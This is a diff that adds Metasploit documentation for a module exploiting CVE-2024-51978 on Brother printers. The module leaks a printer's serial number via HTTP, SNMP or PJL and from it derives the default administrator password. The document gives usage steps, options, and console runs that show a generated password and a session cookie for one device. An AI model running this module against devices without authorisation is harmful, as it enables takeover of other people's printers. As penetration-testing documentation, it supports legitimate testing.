|
| 1 | +## Vulnerable Application |
| 2 | + |
| 3 | +By leaking a target devices serial number, a remote attacker can generate the target devices default |
| 4 | +administrator password. The target device may leak its serial number via unauthenticated HTTP, HTTPS, IPP, |
| 5 | +SNMP, or PJL requests. |
| 6 | + |
| 7 | +## Testing |
| 8 | +Run the module against a vulnerable device (full list [here](https://www.cve.org/CVERecord?id=CVE-2024-51978)). |
| 9 | +If the default password is correctly generated, the module will be able to verify this. |
| 10 | + |
| 11 | +The module will also report an HTTP cookie `AuthCookie` which can be used, for example via Burp's proxy feature, to |
| 12 | +get access to an administrator session on the target devices web interface. |
| 13 | + |
| 14 | +## Verification Steps |
| 15 | + |
| 16 | +1. Start msfconsole |
| 17 | +2. `use auxiliary/admin/misc/brother_default_admin_auth_bypass_cve_2024_51978` |
| 18 | +3. `set RHOST <TARGET_IP_ADDRESS>` |
| 19 | +4. `run` |
| 20 | + |
| 21 | +## Options |
| 22 | + |
| 23 | +### TargetSerial |
| 24 | +A serial number to use for this target. If none is specified, the target will be queried via either HTTP, SNMP, or PJL |
| 25 | +to discover the serial number (as per the `DiscoverSerialVia` option). |
| 26 | + |
| 27 | +### DiscoverSerialVia |
| 28 | +The technique to use to discover the serial number. Can be one of `AUTO`, `HTTP`, `SNMP`, or `PJL`. The default is `AUTO`. |
| 29 | + |
| 30 | +### SaltLookupIndex |
| 31 | +The index into the salt table to use when generating the default password. The default is `254`, which is the expected |
| 32 | +value for Brother devices. |
| 33 | + |
| 34 | +### SaltData |
| 35 | +The salt data to use when generating the default password. By default, no salt data is required. |
| 36 | + |
| 37 | +### ValidatePassword |
| 38 | +Validate the default password by attempting to login. By default, this is set to `true`. |
| 39 | + |
| 40 | +## Scenarios |
| 41 | + |
| 42 | +_Note: In these example scenarios, the leaked serial numbers have been redacted with `***************`._ |
| 43 | + |
| 44 | +### MFC-L9570CDW |
| 45 | + |
| 46 | +In this example, the target `MFC-L9570CDW` device was running the latest firmware at the time of testing (June 20, 2025), |
| 47 | +whereby the `MAIN` version was `ZQ2503251054`, and the `SUB1` version was `1.35`. We can note that while the serial |
| 48 | +number could not be leaked via HTTPS (via CVE-2024-51977), we were able to leak the serial number via SNMP and then |
| 49 | +proceed to generate the correct default administrator password. The module validated that this password value is still |
| 50 | +the default administrator password for the device. |
| 51 | + |
| 52 | +``` |
| 53 | +msf6 auxiliary(admin/misc/brother_default_admin_auth_bypass_cve_2024_51978) > set VERBOSE true |
| 54 | +VERBOSE => true |
| 55 | +msf6 auxiliary(admin/misc/brother_default_admin_auth_bypass_cve_2024_51978) > set RHOSTS 192.168.86.62 |
| 56 | +RHOSTS => 192.168.86.62 |
| 57 | +msf6 auxiliary(admin/misc/brother_default_admin_auth_bypass_cve_2024_51978) > show options |
| 58 | +
|
| 59 | +Module options (auxiliary/admin/misc/brother_default_admin_auth_bypass_cve_2024_51978): |
| 60 | +
|
| 61 | + Name Current Setting Required Description |
| 62 | + ---- --------------- -------- ----------- |
| 63 | + COMMUNITY public yes SNMP Community String |
| 64 | + PJL_RPORT 9100 yes The target port number for PJL |
| 65 | + Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported p |
| 66 | + roxies: sapni, socks4, socks5, socks5h, http |
| 67 | + RETRIES 1 yes SNMP Retries |
| 68 | + RHOSTS 192.168.86.62 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit |
| 69 | + /basics/using-metasploit.html |
| 70 | + RPORT 443 yes The target port (TCP) |
| 71 | + SNMP_OID_SERAILNO 1.3.6.1.2.1.43.5.1.1.17.1 yes The SNMP OID for the serial number |
| 72 | + SNMP_RPORT 161 yes The target port number for SNMP |
| 73 | + SSL true no Negotiate SSL/TLS for outgoing connections |
| 74 | + TARGETURI / yes The base URI path to the web admin console |
| 75 | + TIMEOUT 1 yes SNMP Timeout |
| 76 | + VERSION 1 yes SNMP Version <1/2c> |
| 77 | + VHOST no HTTP server virtual host |
| 78 | +
|
| 79 | +
|
| 80 | +View the full module info with the info, or info -d command. |
| 81 | +
|
| 82 | +msf6 auxiliary(admin/misc/brother_default_admin_auth_bypass_cve_2024_51978) > run |
| 83 | +[*] Running module against 192.168.86.62 |
| 84 | +[*] Attempting to leak serial number via HTTP |
| 85 | +[-] Unexpected HTTP response code: 302 |
| 86 | +[*] Attempting to leak serial number via SNMP |
| 87 | +[*] Leaked target serial number via SNMP: *************** |
| 88 | +[*] Generating default password with salt lookup index 254 and salt data 7HOLDhk' |
| 89 | +[*] Generated password value: r/5LM&U> |
| 90 | +[*] Attempting to validate password |
| 91 | +[*] Received an AuthCookie value: bi56MaYmMOhcwuH8miqCW5YvSGqKRqr8EOgiAr0yA20%3D |
| 92 | +[+] Successfully validated the administrator password: r/5LM&U> |
| 93 | +[*] Auxiliary module execution completed |
| 94 | +msf6 auxiliary(admin/misc/brother_default_admin_auth_bypass_cve_2024_51978) > |
| 95 | +``` |
| 96 | + |
| 97 | +### DCP-L2530DW |
| 98 | + |
| 99 | +In this example, the target `DCP-L2530DW` device was running the following firmware version, whereby the `MAIN` version |
| 100 | +was `ZC2403082049`, and the `SUB1` version was `1.04`. We can note that the serial number was successfully leaked via |
| 101 | +HTTPS (via CVE-2024-51977), however the password value generated was not the devices default password, so validation |
| 102 | +did not succeed. |
| 103 | + |
| 104 | +``` |
| 105 | +msf6 auxiliary(admin/misc/brother_default_admin_auth_bypass_cve_2024_51978) > set RHOSTS 192.168.86.3 |
| 106 | +RHOSTS => 192.168.86.3 |
| 107 | +msf6 auxiliary(admin/misc/brother_default_admin_auth_bypass_cve_2024_51978) > show options |
| 108 | +
|
| 109 | +Module options (auxiliary/admin/misc/brother_default_admin_auth_bypass_cve_2024_51978): |
| 110 | +
|
| 111 | + Name Current Setting Required Description |
| 112 | + ---- --------------- -------- ----------- |
| 113 | + COMMUNITY public yes SNMP Community String |
| 114 | + PJL_RPORT 9100 yes The target port number for PJL |
| 115 | + Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported p |
| 116 | + roxies: sapni, socks4, socks5, socks5h, http |
| 117 | + RETRIES 1 yes SNMP Retries |
| 118 | + RHOSTS 192.168.86.3 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit |
| 119 | + /basics/using-metasploit.html |
| 120 | + RPORT 443 yes The target port (TCP) |
| 121 | + SNMP_OID_SERAILNO 1.3.6.1.2.1.43.5.1.1.17.1 yes The SNMP OID for the serial number |
| 122 | + SNMP_RPORT 161 yes The target port number for SNMP |
| 123 | + SSL true no Negotiate SSL/TLS for outgoing connections |
| 124 | + TARGETURI / yes The base URI path to the web admin console |
| 125 | + TIMEOUT 1 yes SNMP Timeout |
| 126 | + VERSION 1 yes SNMP Version <1/2c> |
| 127 | + VHOST no HTTP server virtual host |
| 128 | +
|
| 129 | +
|
| 130 | +View the full module info with the info, or info -d command. |
| 131 | +
|
| 132 | +msf6 auxiliary(admin/misc/brother_default_admin_auth_bypass_cve_2024_51978) > run |
| 133 | +[*] Running module against 192.168.86.3 |
| 134 | +[*] Attempting to leak serial number via HTTP |
| 135 | +[*] Leaked target serial number via HTTP: *************** |
| 136 | +[*] Generating default password with salt lookup index 254 and salt data 7HOLDhk' |
| 137 | +[*] Generated password value: pX-KDn3+ |
| 138 | +[*] Attempting to validate password |
| 139 | +[-] Failed to login with the administrator password: pX-KDn3+ |
| 140 | +[*] Auxiliary module execution completed |
| 141 | +msf6 auxiliary(admin/misc/brother_default_admin_auth_bypass_cve_2024_51978) > |
| 142 | +``` |
0 commit comments